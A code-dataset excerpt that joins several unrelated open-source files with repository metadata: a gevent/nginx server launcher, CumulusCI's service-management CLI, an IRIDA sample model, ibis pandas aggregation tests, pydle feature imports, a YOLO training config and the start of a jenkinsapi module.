if enable_cluster:
admin = 'cluster manager '
print('%slistening at host %s, port %s' % (admin, str(host_list), str(pport)))
servers = []
#if gConfig['webservice']['enable'] in [u'true', u'TRUE']:
#h, p = gConfig['webservice']['host'], int(gConfig['webservice']['port'])
#print('listening webservice at http://%s:%d/webservice' % (h, p))
#server = pywsgi.WSGIServer((h, p), get_wsapplication())
#servers.append(server)
#server.start()
if len(host_list)>0:
idx = 0
if isinstance(pport, int):
for i in host_list:
if enable_ssl:
server = pywsgi.WSGIServer((i, pport), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, pport), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list)-1:
server.start()
idx += 1
servers[-1].serve_forever()
elif isinstance(pport, unicode):
for i in host_list:
if enable_ssl:
server = pywsgi.WSGIServer((i, int(pport)), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, int(pport)), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list)-1:
server.start()
idx += 1
servers[-1].serve_forever()
elif isinstance(pport, list):
for i in host_list:
for j in pport:
if enable_ssl:
server = pywsgi.WSGIServer((i, int(j)), app, handler_class = WebSocketHandler, keyfile = gConfig['listen_port']['keyfile'], certfile = gConfig['listen_port']['certfile'])
else:
server = pywsgi.WSGIServer((i, int(j)), app, handler_class = WebSocketHandler)
servers.append(server)
if idx < len(host_list) * len(pport)-1:
server.start()
idx += 1
servers[-1].serve_forever()
else:
print('wrong host or port in %s' % db_util.CONFIGFILE)
return server
def mainloop_nginx(popen):
while True:
stdoutdata, stderrdata = popen.communicate()
#if stdoutdata:
#queue.put(stdoutdata)
gevent.sleep(0.01)
def mainloop_manager(queue):
while True:
        qget = queue.get()
if qget:
print(qget)
gevent.sleep(0.01)
def create_cluster():
#global gConfig, gClusterProcess
conf = ''
with open(gConfig['cluster']['nginx_conf_template']) as f:
conf = f.read()
rg = gConfig['cluster']['port_range']
node_list = '\n'
for port in range(int(rg[0]), int(rg[1]), int(rg[2])):
node_list += ' server 127.0.0.1:%d;\n' % port
listen_port = gConfig['listen_port']['port']
access_log = gConfig['cluster']['nginx_log']
host = get_host_ip()
host.append('localhost')
server_name = ' '.join(host)
conf = conf.replace('[node_list]', str(node_list))
conf = conf.replace('[listen_port]', str(listen_port))
conf = conf.replace('[access_log]', str(access_log))
conf = conf.replace('[server_name]', str(server_name))
p = os.path.abspath(gConfig['cluster']['nginx_conf_template'])
p = os.path.join(os.path.dirname(p), 'nginx.conf')
#print(conf)
with open(p, 'w') as f:
f.write(conf)
idx = 0
for port in range(int(rg[0]), int(rg[1]), int(rg[2])):
print('process%d is starting...' % idx)
proc = Process(target=mainloop_single, args=(port, False, False))
proc.start()
#gClusterProcess[str(proc.pid)] = proc
idx += 1
print('nginx is starting...')
popen = subprocess.Popen([os.path.abspath(gConfig['cluster']['nginx_exe']), '-c', p ])
def get_pid_from_name(name):
out = subprocess.check_output(['tasklist','/SVC'])
#print(out)
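    # Rough shape of the `tasklist /SVC` output parsed below (column widths
    # vary by Windows version; shown only as an illustration):
    #   Image Name                     PID Services
    #   ========================= ======== ============
    #   nginx.exe                     4242 N/A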
l = out.split('\r\n')
findlist = []
for i in l:
arr = i.split(' ')
for j in arr:
if len(j)>0 and name in j:
for k in arr:
if arr.index(k)==0:
continue
if len(k)>0:
try:
pid = int(k)
findlist.append(pid)
break
except:
continue
break
#print(findlist)
if current_process().pid in findlist:
findlist.remove(current_process().pid)
return findlist
def kill_cluster():
#global gClusterProcess
print('kill nginx...')
for pid in get_pid_from_name('nginx'):
try:
out = subprocess.check_output(['taskkill', '/F', '/PID', str(pid), '/T'])
print(out)
except:
pass
for pid in get_pid_from_name('python'):
print('kill python.exe[%s]...' % pid)
out = subprocess.check_output(['taskkill', '/F', '/PID', str(pid), '/T'])
print(out)
#for pid in gClusterProcess.keys():
#print('kill python.exe[%s]...' % pid)
#gClusterProcess[pid].terminate()
print('kill done')
def create_self_signed_cert(cert_dir, year=10):
from OpenSSL import crypto, SSL
CERT_FILE = "ssl_certificate.crt"
KEY_FILE = "ssl_self_signed.key"
if not os.path.exists(os.path.join(cert_dir, CERT_FILE)) or not os.path.exists(os.path.join(cert_dir, KEY_FILE)):
k = crypto.PKey()
k.generate_key(crypto.TYPE_RSA, 4096)
cert = crypto.X509()
cert.get_subject().C = "AQ"
cert.get_subject().ST = "State"
cert.get_subject().L = "City"
cert.get_subject().O = "Company"
cert.get_subject().OU = "Organization"
cert.get_subject().CN = socket.gethostname()
cert.set_serial_number(1000)
cert.gmtime_adj_notBefore(0)
cert.gmtime_adj_notAfter(year*365*24*60*60)
cert.set_issuer(cert.get_subject())
cert.set_pubkey(k)
cert.sign(k, 'sha1')
with open(os.path.join(cert_dir, CERT_FILE), "wt") as f:
f.write(crypto.dump_certificate(crypto.FILETYPE_PEM, cert))
with open(os.path.join(cert_dir, KEY_FILE), "wt") as f:
f.write(crypto.dump_privatekey(crypto.FILETYPE_PEM, k))
#create_self_signed_cert('.')
print('Create SSL key and cert done')
else:
print('SSL key and cert already exist')
def gen_model_app_cache():
global gConfig
if not gConfig.has_key('web_cache'):
return
s = 'CACHE MANIFEST\n'
s += '#' + gConfig['web_cache']['version'] + '\n'
if gConfig['web_cache']['gltf_cache_enable'].lower() == u'true':
modelsdir = os.path.join(STATICRESOURCE_DIR, 'gltf')
if not os.path.exists(modelsdir):
return
l = os.listdir(modelsdir)
for i in l:
s += '/gltf/' + i + '\n'
file_or_dir_cache = gConfig['web_cache']['file_or_dir_cache']
if len(file_or_dir_cache) > 0 :
for root, dirs, files in os.walk(STATICRESOURCE_DIR, topdown=False):
for name in dirs:
if name in file_or_dir_cache:
p = os.path.join(root, name)
for root1, dirs1, files1 in os.walk(p, topdown=False):
for name1 in files1:
p1 = os.path.join(root1, name1)
p1 = p1.replace(STATICRESOURCE_DIR, '').replace('\\', '/')
s += p1 + '\n'
for name in files:
if name in file_or_dir_cache:
p = os.path.join(root, name)
p = p.replace(STATICRESOURCE_DIR, '').replace('\\', '/')
s += p + '\n'
s += 'NETWORK:\n'
s += '*\n'
with open(os.path.join(STATICRESOURCE_DIR, 'kmgd.appcache'), 'w') as f:
f.write(s)
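    # Shape of the generated kmgd.appcache manifest (illustrative entries only):
    #   CACHE MANIFEST
    #   #<version from gConfig['web_cache']['version']>
    #   /gltf/tower.gltf
    #   /js/app.js
    #   NETWORK:
    #   *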
if __name__=="__main1__":
freeze_support()
options = db_util.init_global()
#print(options)
init_global()
s = get_sign_alipay(u'dsadsadsadsadsadsa')
print(s)
print(len(s))
#print(gSecurityConfig)
#key = 'application_' + gConfig['wsgi']['application']
#if globals().has_key(key):
#app = globals()[key]
#else:
#print('unknown application:%s' % gConfig['wsgi']['application'])
if __name__=="__main__":
freeze_support()
options = db_util.init_global()
init_global()
if options.signcert_enable:
create_self_signed_cert( options.signcert_directory, options.signcert_year)
elif options.batch_download_tile_enable:
db_util.command_batch_tile_download(options)
else:
if options.cluster_enable:
mainloop_single(int(gConfig['cluster']['manager_port']), True, False)
else:
if gConfig['listen_port']['enable_ssl'].lower() == u'true':
port = 443
try:
port = int(gConfig['listen_port']['ssl_port'])
except:
pass
mainloop_single(port, False, True)
else:
mainloop_single()
class Win32ServiceHandler(object):
# no parameters are permitted; all configuration should be placed in the
# configuration file and handled in the Initialize() method
def __init__(self):
pass
# called when the service is starting
def Initialize(self, configFileName):
self.server = None
self.stopEvent = threading.Event()
self.stopRequestedEvent = threading.Event()
# called when the service is starting immediately after Initialize()
# use this to perform the work of the service; don't forget to set or check
# for the stop event or the service GUI will not respond to requests to
# stop the service
def Run(self):
#self.stopRequestedEvent.wait()
self.stopEvent.set()
init_global()
self.server = mainloop_single()
# called when the service is being stopped by the service manager GUI
def Stop(self):
self.stopRequestedEvent.set()
self.stopEvent.wait()
if self.server:
self.server.stop()
| 45.568709
| 273
| 0.569165
|
25bf64e0e63e81ecc1320268515b02375195678f
| 13,699
|
py
|
Python
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 163
|
2018-09-13T18:49:34.000Z
|
2022-03-25T08:37:15.000Z
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 1,280
|
2018-09-11T20:09:37.000Z
|
2022-03-31T18:40:21.000Z
|
cumulusci/cli/service.py
|
SFDO-Tooling/CumulusCI
|
08bb30eb24eae0b33cff755dfba40760317d7c0f
|
[
"BSD-3-Clause"
] | 93
|
2018-09-13T07:29:22.000Z
|
2022-03-26T23:15:48.000Z
|
import json
import os
from pathlib import Path
from typing import Callable, Optional
import click
from cumulusci.core.config import ServiceConfig
from cumulusci.core.exceptions import CumulusCIException, ServiceNotConfigured
from cumulusci.core.utils import import_class, import_global
from .runtime import pass_runtime
from .ui import CliTable
@click.group("service", help="Commands for connecting services to the keychain")
def service():
pass
# Commands for group: service
@service.command(name="list", help="List services available for configuration and use")
@click.option("--plain", is_flag=True, help="Print the table using plain ascii.")
@click.option("--json", "print_json", is_flag=True, help="Print a json string")
@pass_runtime(require_project=False, require_keychain=True)
def service_list(runtime, plain, print_json):
services = (
runtime.project_config.services
if runtime.project_config is not None
else runtime.universal_config.services
)
supported_service_types = list(services.keys())
supported_service_types.sort()
if print_json:
click.echo(json.dumps(services))
return None
configured_services = runtime.keychain.list_services()
plain = plain or runtime.universal_config.cli__plain_output
data = [["Default", "Type", "Name", "Description"]]
for service_type in supported_service_types:
if service_type not in configured_services:
data.append(
[False, service_type, "", services[service_type]["description"]]
)
continue
default_service_for_type = runtime.keychain._default_services.get(service_type)
description = services[service_type]["description"]
for alias in configured_services[service_type]:
data.append(
[
alias == default_service_for_type,
service_type,
alias,
description,
]
)
rows_to_dim = [row_index for row_index, row in enumerate(data) if not row[2]]
table = CliTable(
data,
title="Services",
dim_rows=rows_to_dim,
)
table.echo(plain)
class ConnectServiceCommand(click.MultiCommand):
def _get_services_config(self, runtime):
return (
runtime.project_config.services
if runtime.project_config
else runtime.universal_config.services
)
def list_commands(self, ctx):
"""list the services that can be configured"""
runtime = ctx.obj
services = self._get_services_config(runtime)
return sorted(services.keys())
def _build_param(self, attribute: str, details: dict) -> click.Option:
req = details["required"]
default_factory: Optional[Callable] = self._get_callable_default(
details.get("default_factory")
)
prompt = None if default_factory else req
kwargs = {
"prompt": prompt,
"required": req,
"help": details.get("description"),
"default": default_factory,
}
return click.Option((f"--{attribute}",), **kwargs)
def _get_callable_default(self, default_factory_path) -> Optional[Callable]:
"""
Given a class_path, return a callable providing a default value for click.Option.
"""
default_factory: Optional[Callable] = None
if default_factory_path:
default_factory = import_global(default_factory_path)
return default_factory
def _get_default_options(self, runtime):
options = []
options.append(
click.Option(
("--default",),
is_flag=True,
help="Set this service as the global default.",
)
)
if runtime.project_config is not None:
options.append(
click.Option(
("--project",),
is_flag=True,
help="Set this service as the default for this project only.",
)
)
return options
def get_command(self, ctx, service_type):
runtime = ctx.obj
runtime._load_keychain()
services = self._get_services_config(runtime)
try:
service_config = services[service_type]
except KeyError:
raise click.UsageError(
f"Sorry, I don't know about the '{service_type}' service."
)
attributes = service_config["attributes"].items()
params = [self._build_param(attr, cnfg) for attr, cnfg in attributes]
params.extend(self._get_default_options(runtime))
def callback(*args, **kwargs):
service_name = kwargs.get("service_name")
if not service_name:
click.echo(
"No service name specified. Using 'default' as the service name."
)
service_name = "default"
configured_services = runtime.keychain.list_services()
if (
service_type in configured_services
and service_name in configured_services[service_type]
):
click.confirm(
f"There is already a {service_type}:{service_name} service. Do you want to overwrite it?",
abort=True,
)
prompt_to_default_service = f"A default service already exists for service type {service_type}. Would you like to set this service as the new default?"
            default_service_exists = (
                runtime.keychain.get_default_service_name(service_type) is not None
            )
set_as_default = default_service_exists and click.confirm(
prompt_to_default_service
)
if runtime.project_config is None:
set_project_default = False
else:
set_project_default = kwargs.pop("project", False)
set_global_default = kwargs.pop("default", False)
serv_conf = dict(
(k, v) for k, v in list(kwargs.items()) if v is not None
) # remove None values
# A service can define a callable to validate the service config
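            # (Hedged illustration, not from upstream docs: the validator is a
            # dotted import path; it receives the collected option dict and any
            # dict it returns is merged back into the service config.)
            #   def validate_service(options):
            #       options["url"] = options["url"].rstrip("/")
            #       return options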
validator_path = service_config.get("validator")
if validator_path:
validator = import_global(validator_path)
updated_conf: dict = validator(serv_conf)
if updated_conf:
serv_conf.update(updated_conf)
ConfigClass = ServiceConfig
if "class_path" in service_config:
class_path = service_config["class_path"]
try:
ConfigClass = import_class(class_path)
except (AttributeError, ModuleNotFoundError):
raise CumulusCIException(
f"Unrecognized class_path for service: {class_path}"
)
# Establish OAuth2 connection if required by this service
if hasattr(ConfigClass, "connect"):
oauth_dict = ConfigClass.connect(runtime.keychain, kwargs)
serv_conf.update(oauth_dict)
config_instance = ConfigClass(serv_conf, service_name, runtime.keychain)
runtime.keychain.set_service(
service_type,
service_name,
config_instance,
)
click.echo(f"Service {service_type}:{service_name} is now connected")
if set_as_default:
runtime.keychain.set_default_service(service_type, service_name)
click.echo(
f"Service {service_type}:{service_name} is now the default for service type: {service_type}."
)
if set_global_default:
runtime.keychain.set_default_service(
service_type, service_name, project=False
)
click.echo(
f"Service {service_type}:{service_name} is now the default for all CumulusCI projects"
)
if set_project_default:
runtime.keychain.set_default_service(
service_type, service_name, project=True
)
project_name = runtime.project_config.project__name
click.echo(
f"Service {service_type}:{service_name} is now the default for project '{project_name}'"
)
params.append(click.Argument(["service_name"], required=False))
return click.Command(service_type, params=params, callback=callback)
@service.command(
cls=ConnectServiceCommand,
name="connect",
help="Connect an external service to CumulusCI",
)
def service_connect():
pass
@service.command(name="info", help="Show the details of a connected service")
@click.argument("service_type")
@click.argument("service_name", required=False)
@click.option("--plain", is_flag=True, help="Print the table using plain ascii.")
@pass_runtime(require_project=False, require_keychain=True)
def service_info(runtime, service_type, service_name, plain):
try:
plain = plain or runtime.universal_config.cli__plain_output
service_config = runtime.keychain.get_service(service_type, service_name)
service_data = [["Key", "Value"]]
service_data.extend(
[
[click.style(k, bold=True), str(v)]
for k, v in service_config.config.items()
if k != "service_name"
]
)
default_service = runtime.keychain.get_default_service_name(service_type)
service_name = default_service if not service_name else service_name
service_table = CliTable(service_data, title=f"{service_type}:{service_name}")
service_table.echo(plain)
except ServiceNotConfigured:
click.echo(
f"{service_type} is not configured for this project. Use service connect {service_type} to configure."
)
@service.command(
name="default", help="Set the default service for a given service type."
)
@click.argument("service_type")
@click.argument("service_name")
@click.option(
"--project",
is_flag=True,
help="Sets the service as the default for the current project.",
)
@pass_runtime(require_project=False, require_keychain=True)
def service_default(runtime, service_type, service_name, project):
try:
runtime.keychain.set_default_service(service_type, service_name, project)
except ServiceNotConfigured as e:
click.echo(f"An error occurred setting the default service: {e}")
return
if project:
project_name = Path(runtime.keychain.project_local_dir).name
click.echo(
f"Service {service_type}:{service_name} is now the default for project '{project_name}'"
)
else:
click.echo(
f"Service {service_type}:{service_name} is now the default for all CumulusCI projects"
)
@service.command(name="rename", help="Rename a service")
@click.argument("service_type")
@click.argument("current_name")
@click.argument("new_name")
@pass_runtime(require_project=False, require_keychain=True)
def service_rename(runtime, service_type, current_name, new_name):
try:
runtime.keychain.rename_service(service_type, current_name, new_name)
except ServiceNotConfigured as e:
click.echo(f"An error occurred renaming the service: {e}")
return
click.echo(f"Service {service_type}:{current_name} has been renamed to {new_name}")
@service.command(name="remove", help="Remove a service")
@click.argument("service_type")
@click.argument("service_name")
@pass_runtime(require_project=False, require_keychain=True)
def service_remove(runtime, service_type, service_name):
# cannot remove services defined via env vars
env_var_name = (
f"{runtime.keychain.env_service_var_prefix}{service_type}__{service_name}"
)
if os.environ.get(env_var_name):
message = (
f"The service {service_type}:{service_name} is defined by environment variables. "
f"If you would like it removed please delete the environment variable with name: {env_var_name}"
)
click.echo(message)
return
new_default = None
if len(
runtime.keychain.services.get(service_type, {}).keys()
) > 2 and service_name == runtime.keychain._default_services.get(service_type):
click.echo(
f"The service you would like to remove is currently the default for {service_type} services."
)
click.echo("Your other services of the same type are:")
for alias in runtime.keychain.list_services()[service_type]:
if alias != service_name:
click.echo(alias)
new_default = click.prompt(
"Enter the name of the service you would like as the new default"
)
if new_default not in runtime.keychain.list_services()[service_type]:
click.echo(f"No service of type {service_type} with name: {new_default}")
return
try:
runtime.keychain.remove_service(service_type, service_name)
if new_default:
runtime.keychain.set_default_service(service_type, new_default)
except ServiceNotConfigured as e:
click.echo(f"An error occurred removing the service: {e}")
return
click.echo(f"Service {service_type}:{service_name} has been removed.")
| 37.842541
| 163
| 0.628294
|
0532d73c938a1ee33d7f7889b9bf3affbabc5a55
| 2,983
|
py
|
Python
|
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | 1
|
2019-04-10T12:37:00.000Z
|
2019-04-10T12:37:00.000Z
|
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | null | null | null |
model/sample.py
|
telatin/qi-irida-uploader
|
c3e64857dd8d02045062afbf0eb9f9989951a429
|
[
"Apache-2.0"
] | 2
|
2019-04-10T11:58:24.000Z
|
2020-02-07T17:06:17.000Z
|
"""
A Sample stores (key: value) pairs using a dictionary.
Keys from a sequencer include 'sampleName' and 'description'.
Keys from IRIDA will include these and many others.
"""
from cerberus import Validator, TypeDefinition
from copy import deepcopy
from .sequence_file import SequenceFile
class Sample:
# Define SequenceFile as a type for validation
_sample_type = TypeDefinition('sequence_file', (SequenceFile,), ())
Validator.types_mapping['sequence_file'] = _sample_type
uploadable_schema = {'_sequence_file': {
'type': 'sequence_file',
'nullable': False,
'required': True,
},
'_sample_name': {
'type': 'string',
'nullable': False,
'required': True,
'minlength': 3 # Minimum sample name length is 3
},
'_description': {
'type': 'string',
'nullable': True,
'required': False
},
'_sample_number': {
'anyof_type': ['string', 'integer'],
'nullable': True,
'required': False
}}
def __init__(self, sample_name, description='', sample_number=None, samp_dict=None):
self._sample_name = sample_name
self._description = description
self._sample_number = sample_number
if samp_dict is None:
samp_dict = {}
self._sample_dict = dict(samp_dict)
self._sequence_file = None
@property
def sample_name(self):
return self._sample_name
@property
def description(self):
return self._description
@property
def sample_number(self):
return self._sample_number
@property
def sequence_file(self):
return self._sequence_file
@sequence_file.setter
def sequence_file(self, sq):
self._sequence_file = sq
def get_irida_id(self):
if "identifier" in self._sample_dict:
return self.get("identifier")
else:
return None
def get_uploadable_dict(self): # formatting for sending to irida when creating a project
uploadable_dict = deepcopy(self._sample_dict)
uploadable_dict['sampleName'] = self.sample_name
uploadable_dict['description'] = self.description
return uploadable_dict
def __getitem__(self, key):
if key in self._sample_dict:
return self._sample_dict[key]
return None
def get(self, key):
return self.__getitem__(key)
def __str__(self):
        return str(self.get_uploadable_dict()) + str(self.sequence_file)
def get_dict(self):
return self.__dict__
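# Minimal usage sketch (hedged: SequenceFile's constructor arguments are an
# assumption, since they are not shown in this module):
#   sample = Sample("sample-01", description="demo run", sample_number=1)
#   sample.sequence_file = SequenceFile(...)  # attach the run's sequence data
#   sample.get_uploadable_dict()
#   # -> {'sampleName': 'sample-01', 'description': 'demo run'}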
| 31.072917
| 93
| 0.552464
|
7786bcfd48c992c2046454a1b9ba51f9cfa0a079
| 3,975
|
py
|
Python
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 986
|
2017-06-07T07:33:01.000Z
|
2022-03-31T13:00:46.000Z
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 2,623
|
2017-06-07T18:29:11.000Z
|
2022-03-31T20:27:31.000Z
|
ibis/backends/pandas/tests/test_aggcontext.py
|
GrapeBaBa/ibis
|
507bb14efdcfd719a0487ee23fe1c85c177517f6
|
[
"Apache-2.0"
] | 238
|
2017-06-26T19:02:58.000Z
|
2022-03-31T15:18:29.000Z
|
import numpy as np
import pandas as pd
import pytest
from pandas.util import testing as tm
from pytest import param
from ..aggcontext import Summarize, window_agg_udf
df = pd.DataFrame(
{
'id': [1, 2, 1, 2],
'v1': [1.0, 2.0, 3.0, 4.0],
'v2': [10.0, 20.0, 30.0, 40.0],
}
)
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1: v1.mean(),
lambda df: df['v1'].mean(),
id='udf',
),
param(
'mean',
lambda df: df['v1'].mean(),
id='string',
),
],
)
def test_summarize_single_series(agg_fn, expected_fn):
"""Test Summarize.agg operating on a single Series."""
aggcontext = Summarize()
result = aggcontext.agg(df['v1'], agg_fn)
expected = expected_fn(df)
assert result == expected
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1: v1.mean(),
lambda df: df['v1'].mean(),
id='udf',
),
param(
'mean',
lambda df: df['v1'].mean(),
id='string',
),
],
)
def test_summarize_single_seriesgroupby(agg_fn, expected_fn):
"""Test Summarize.agg operating on a single SeriesGroupBy."""
aggcontext = Summarize()
df_grouped = df.sort_values('id').groupby('id')
result = aggcontext.agg(df_grouped['v1'], agg_fn)
expected = expected_fn(df_grouped)
tm.assert_series_equal(result, expected)
@pytest.mark.parametrize(
('agg_fn', 'expected_fn'),
[
param(
lambda v1, v2: v1.mean() - v2.mean(),
lambda df: df['v1'].mean() - df['v2'].mean(),
id='two-column',
),
# Two columns, but only the second one is actually used in UDF
param(
lambda v1, v2: v2.mean(),
lambda df: df['v2'].mean(),
id='redundant-column',
),
],
)
def test_summarize_multiple_series(agg_fn, expected_fn):
"""Test Summarize.agg operating on many Series."""
aggcontext = Summarize()
args = [df['v1'], df['v2']]
result = aggcontext.agg(args[0], agg_fn, *args[1:])
expected = expected_fn(df)
assert result == expected
@pytest.mark.parametrize(
'param',
[
(
pd.Series([True, True, True, True]),
pd.Series([1.0, 2.0, 2.0, 3.0]),
),
(
pd.Series([False, True, True, False]),
pd.Series([np.NaN, 2.0, 2.0, np.NaN]),
),
],
)
def test_window_agg_udf(param):
"""Test passing custom window indices for window aggregation."""
mask, expected = param
grouped_data = df.sort_values('id').groupby('id')['v1']
result_index = grouped_data.obj.index
window_lower_indices = pd.Series([0, 0, 2, 2])
window_upper_indices = pd.Series([1, 2, 3, 4])
result = window_agg_udf(
grouped_data,
lambda s: s.mean(),
window_lower_indices,
window_upper_indices,
mask,
result_index,
dtype='float',
max_lookback=None,
)
expected.index = grouped_data.obj.index
tm.assert_series_equal(result, expected)
def test_window_agg_udf_different_freq():
"""Test that window_agg_udf works when the window series and data series
have different frequencies.
"""
time = pd.Series([pd.Timestamp('20200101'), pd.Timestamp('20200201')])
data = pd.Series([1, 2, 3, 4, 5, 6])
window_lower_indices = pd.Series([0, 4])
window_upper_indices = pd.Series([5, 7])
mask = pd.Series([True, True])
result_index = time.index
result = window_agg_udf(
data,
lambda s: s.mean(),
window_lower_indices,
window_upper_indices,
mask,
result_index,
'float',
None,
)
expected = pd.Series([data.iloc[0:5].mean(), data.iloc[4:7].mean()])
tm.assert_series_equal(result, expected)
| 23.802395
| 76
| 0.562767
|
c87f883e259e68fae1024be49a65e850a4f4dcd8
| 591
|
py
|
Python
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 150
|
2015-02-18T04:19:16.000Z
|
2022-03-29T20:39:45.000Z
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 112
|
2015-04-18T02:48:38.000Z
|
2022-03-28T03:50:44.000Z
|
pydle/features/__init__.py
|
Rixxan/pydle
|
6ec21f0167d99fbe1faef02ca03c12c0d7c0db99
|
[
"BSD-3-Clause"
] | 51
|
2015-01-30T19:40:30.000Z
|
2022-03-22T07:32:29.000Z
|
from . import rfc1459, account, ctcp, tls, isupport, whox, ircv3
from .rfc1459 import RFC1459Support
from .account import AccountSupport
from .ctcp import CTCPSupport
from .tls import TLSSupport
from .isupport import ISUPPORTSupport
from .whox import WHOXSupport
from .ircv3 import IRCv3Support, IRCv3_1Support, IRCv3_2Support
from .rpl_whoishost import RplWhoisHostSupport
ALL = [IRCv3Support, WHOXSupport, ISUPPORTSupport, CTCPSupport, AccountSupport, TLSSupport, RFC1459Support,
RplWhoisHostSupport]
LITE = [WHOXSupport, ISUPPORTSupport, CTCPSupport, TLSSupport, RFC1459Support]
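# Illustrative usage (not part of the original file): a hedged sketch of how these feature
# lists are typically consumed; `pydle.featurize` is assumed to behave as in upstream pydle,
# and the import is kept out of this module to avoid a circular import.
#     import pydle
#     LiteClient = pydle.featurize(*LITE)
#     client = LiteClient('MyBot', realname='My Bot')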
| 39.4
| 107
| 0.824027
|
3e22a833db655b96f026370c6d4f4acfddd327fe
| 2,132
|
py
|
Python
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | 6
|
2020-08-30T15:00:24.000Z
|
2021-12-08T02:46:45.000Z
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | 1
|
2021-12-21T14:02:34.000Z
|
2021-12-21T14:03:06.000Z
|
yolo_asff/configs.py
|
HirataYurina/yoloV3-keras-sibyl
|
15f6c5f021dfc80d753df6bcdd579ae1139edfb9
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
# author:平手友梨奈ii
# e-mail:1353593259@qq.com
# datetime:1993/12/01
# filename:configs.py
# software: PyCharm
import easydict
CONFIG = easydict.EasyDict()
# evaluation
CONFIG.DETECT = easydict.EasyDict()
CONFIG.DETECT.SCORE = 0.3
CONFIG.DETECT.IOU = 0.43
CONFIG.DETECT.RESOLUTION = (416, 416)
CONFIG.DETECT.mAP_THRES = 0.85
# prediction
CONFIG.PREDICT = easydict.EasyDict()
CONFIG.PREDICT.WEIGHTS = '../logs/gaussian_yolo3/ep340-loss-5.042.h5'
CONFIG.PREDICT.ANCHOR_PATH = '../model_data/yolo_anchors.txt'
CONFIG.PREDICT.CLASS_PATH = '../model_data/danger_source_classes.txt'
CONFIG.PREDICT.SCORE = 0.3
CONFIG.PREDICT.IOU = 0.43
CONFIG.PREDICT.RESOLUTION = (416, 416)
CONFIG.PREDICT.MAX_BOXES = 40
# train
CONFIG.TRAIN = easydict.EasyDict()
CONFIG.TRAIN.LR_STAGE = 0.001
CONFIG.TRAIN.BATCH = 4  # depends on your GPU memory
CONFIG.TRAIN.EPOCH = 350  # sufficient for transfer training in stage 1
CONFIG.TRAIN.IOU_THRESHOLD = 0.3
# CONFIG.TRAIN.COS_INTERVAL = [0.05, 0.15, 0.30, 0.50] # cosine anneal
CONFIG.TRAIN.COS_INTERVAL = [0.01] # cosine anneal
CONFIG.TRAIN.ANNO_PATH = '../2088_trainval.txt'
CONFIG.TRAIN.VALID_PATH = '../2088_test.txt'
CONFIG.TRAIN.TEST_PATH = ''
CONFIG.TRAIN.CLASS_PATH = '../model_data/danger_source_classes.txt'
CONFIG.TRAIN.ANCHOR_PATH = '../model_data/yolo_anchors.txt'
CONFIG.TRAIN.PRE_TRAINED_MODEL = '../logs/yolo3_weights.h5'
CONFIG.TRAIN.SAVE_PATH = '../logs/yolo_asff/'
CONFIG.TRAIN.SAVE_PERIOD = 10
CONFIG.TRAIN.RESOLUTION = (416, 416)
CONFIG.TRAIN.IGNORE_THRES = 0.7
CONFIG.TRAIN.CONFIDENCE_FOCAL = False
CONFIG.TRAIN.CLASS_FOCAL = False
CONFIG.TRAIN.USE_DIOU = False
CONFIG.TRAIN.USE_CIOU = True
# use scale xy to eliminate grid sensitivity
# CONFIG.TRAIN.SCALE_XY = [1.05, 1.1, 1.2]
CONFIG.TRAIN.FREEZE_LAYERS = 249 # freeze 249 layers in YOLOv3
# Augment
CONFIG.AUG = easydict.EasyDict()
CONFIG.AUG.MAX_BOXES = 50
# dataset
CONFIG.DATASET = easydict.EasyDict()
CONFIG.DATASET.MULTIPROCESS = False  # Windows cannot use Python multiprocessing workers here
CONFIG.DATASET.MOSAIC_AUG = False
CONFIG.DATASET.WORKERS = 1
CONFIG.DATASET.MAX_QUEUE = 128
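# Illustrative usage (not part of the original file): settings are read as plain attribute
# chains from any training or evaluation script.
if __name__ == "__main__":
    print("train batch size:", CONFIG.TRAIN.BATCH)
    print("input resolution:", CONFIG.TRAIN.RESOLUTION)
    print("anchor file:", CONFIG.TRAIN.ANCHOR_PATH)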
| 28.810811
| 88
| 0.755159
|
883b3e35eb4f7eaf9a23f841c2cac77318e6213b
| 3,542
|
py
|
Python
|
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
jenkinsapi/jenkinsbase.py
|
Neofonie/jenkinsapi
|
5b523ce3141cb196363abf30d2e3308ec29bb988
|
[
"MIT"
] | null | null | null |
"""
Module for JenkinsBase class
"""
import ast
import pprint
import logging
from jenkinsapi import config
